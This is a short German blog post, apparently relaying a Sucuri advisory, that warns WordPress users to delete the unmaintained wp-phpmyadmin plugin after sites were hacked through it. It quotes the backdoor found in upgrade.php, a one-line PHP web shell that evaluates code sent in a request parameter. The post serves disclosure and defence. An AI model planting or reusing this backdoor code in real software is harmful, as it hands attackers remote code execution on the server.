Nutzt du das WordPress Plug-In WP-phpmyadmin? Dann solltest du es jetzt laut den Sucuri Experten sofort löschen. Die Security Experten haben verschiedenen Seiten gesehen welche durch die Nutzung von wp-phpmyadmin gehackt wurden.
Der Angriff hat durch eine Backdoor statt gefunden, der folgende Code befand sich in der upgrade.php Datei:
<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>
Dieser Teil ist laut Sucuri nicht Bestandteil des Plug-Ins und erlaubt den Remote Zugriff auf die WordPress Installation.
Das Plug-In soll Zugriff auf phpMyAdmin direkt aus WordPress heraus geben, ist aber schon seit einigen Jahren nicht mehr upgedatet worden. Bitte prüfen ob ihr das Plug nutzt und wenn ja ggf. entfernen!
[…] hier den Originalbeitrag weiterlesen: wp-phpmyadmin Plug-In – Jetzt löschen! || Sucuri, WordPress … […]